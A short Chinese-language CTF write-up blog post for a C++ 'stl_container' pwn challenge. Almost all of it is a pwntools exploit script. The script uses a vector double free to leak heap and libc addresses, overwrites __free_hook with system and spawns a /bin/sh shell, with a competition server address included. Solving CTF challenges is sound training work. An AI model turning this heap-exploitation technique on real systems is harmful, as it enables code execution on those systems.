Whali3n51's blog

一场令人自闭的比赛,只会做这个C++的签到题,多的不会了。可惜的是code_runner那道,没爆破出来。

这一道题还是我学弟运气好,碰出来的,vector容器free的时候,可以double free。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
from PwnContext import *
from pwn import *
#context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
s       = lambda data               :ctx.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
uu32    = lambda data   :u32(data.ljust(4, '\x00'))
uu64    = lambda data   :u64(data.ljust(8, '\x00'))
leak    = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))

ctx.binary = 'stl_container'
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
local=1
def choice():
	if(local):
		p=rs()
	else:
		ctx.remote = ('134.175.239.26',8848)
		p=rs('remote')
	return p


def debug():
	if(local==1):
		libc_base = ctx.bases.libc
		print hex(libc_base)
		ctx.symbols = {'sym1':0xEDA , 'sym2':0x10AF}
		ctx.breakpoints = [0xEDA,0x10AF]
		ctx.debug()

def menu(index):
	sla(">> ",index)
def submenu(index):
	sla(">> ",index)

def List(index,tpe,data):
	menu(1)
	submenu(tpe)
	if tpe== 1:
		sa("input data:",data)
	if tpe== 2:
		sla("index?",index)
	if tpe== 3:
		sla("index?",index)
def Vector(index,tpe,data):
	menu(2)
	submenu(tpe)
	if tpe== 1:
		sa("input data:",data)
	if tpe== 2:
		sla("index?",index)
	if tpe== 3:
		sla("index?",index)
def Queue(index,tpe,data):
	menu(3)
	submenu(tpe)
	if tpe== 1:
		sa("input data:",data)
	if tpe== 3:
		sla("index?",index)
def Stack(index,tpe,data):
	menu(4)
	submenu(tpe)
	if tpe== 1:
		sa("input data:",data)	
	if tpe== 3:
		sla("index?",index)
choice()
Vector(1,1,"f"*0x10+p64(0xa0))
Vector(1,1,"f"*0x10+p64(0xa0))
List(1,1,"w"*0x10+p64(0xa0))
Vector(0,2,0)
Vector(0,2,0)
Vector(0,1,"\xf0")
Vector(0,3,0)
ru("data: ")
heap_base=uu64(r(6))-0x125e0
leak("heap_base",heap_base)
Queue(0,1,p64(heap_base))
Queue(0,1,p64(0)+p64(7)+p64(0)*1+p64(0xa0)+p64(heap_base+0x20)+p64(0)*11+p64(heap_base+0x20))	
Vector(0,3,0)
ru("data: ")
libc_base=uu64(r(6))-(0x7ffff77d7ca0-0x7ffff73ec000)
leak("libc_base",libc_base)
free_hook=libc_base+libc.symbols['__free_hook']
system=libc_base+libc.symbols['system']
List(1,1,p64(free_hook))
Stack(0,1,p64(system))
Vector(0,1,"/bin/sh\x00")
#debug()
irt()